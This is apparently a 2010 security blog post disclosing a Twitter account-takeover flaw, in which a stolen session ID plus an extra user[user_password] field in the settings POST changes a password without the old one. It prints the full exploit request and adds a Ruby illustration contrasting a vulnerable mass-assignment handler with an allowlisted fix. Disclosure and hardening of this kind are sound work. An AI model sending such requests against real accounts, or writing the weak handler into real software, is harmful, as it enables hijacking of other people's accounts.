Vulnerability: with just the Twitter session ID, it is possible to change all of these without knowing the actual password.
This is done by using the "user settings" interface instead of the one meant to change your password.
Just add an extra user[user_password] variable to the POST, and voilà.
Exploit:
POST /account/settings HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Referer: Twitter
Accept-Language: hu-HU
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: twitter.com
Content-Length: 366
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en; _twitter_sess=session-id;

authenticity_token=f3c4667fd7b4231d279159af8ce76a85d06631b9&user%5Bname%5D=yourname&user%5Bscreen_name%5D=username&user%5Bemail%5D=whatever@yourmail.com&auth_password=&user%5Btime_zone%5D=Greenland&user%5Burl%5D=&user%5Bdescription%5D=&user%5Blocation%5D=&user%5Blang%5D=en&user%5Bprotected%5D=0&commit=Save&user%5Buser_password%5D=new_password
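The request above works only if the settings handler applies every submitted user[...] field to the account. The following is an added example, not code from the original post or from Twitter: it assumes that server-side pattern and shows it beside a hardened handler that applies an allowlist and reports anything else. The function names, the allowlist and the sample body are hypothetical and constructed for illustration.

```ruby
require "uri"

# Constructed sample body shaped like the request above (placeholder values).
SAMPLE_BODY = "user%5Bname%5D=yourname&user%5Bemail%5D=whatever%40example.com" \
              "&auth_password=&commit=Save&user%5Buser_password%5D=new_password"

# Hypothetical allowlist: the only fields the profile-settings form may change.
SETTINGS_FIELDS = %w[name screen_name email time_zone url
                     description location lang protected].freeze

# Collect the user[...] fields of a form-encoded body into a hash.
def user_params(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), out|
    m = key.match(/\Auser\[(\w+)\]\z/)
    out[m[1]] = value if m
  end
end

# Weak form (assumed cause): every submitted user[...] field is written to the
# account, so user[user_password] overwrites the stored password.
def update_settings_weak(account, body)
  account.merge(user_params(body))
end

# Hardened form: only allowlisted fields are applied. Rejected field names are
# returned so the caller can log them as a tampering signal.
def update_settings_strict(account, body)
  submitted = user_params(body)
  rejected = submitted.keys - SETTINGS_FIELDS
  [account.merge(submitted.slice(*SETTINGS_FIELDS)), rejected]
end

if __FILE__ == $PROGRAM_NAME
  account = { "name" => "old", "user_password" => "old_secret" }
  puts "weak:   #{update_settings_weak(account, SAMPLE_BODY)}"
  updated, rejected = update_settings_strict(account, SAMPLE_BODY)
  puts "strict: #{updated} rejected=#{rejected}"
end
```

With the allowlist in place, the password can only change through the dedicated password-change path, which is where the check of the current password belongs.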
Saturday, November 6, 2010
Twitter password change exploit
About Me
- About Zer0-0ne
- A blog for information security research and development, intended for posting the latest vulnerabilities and weaknesses. Founder darknessn1k0!4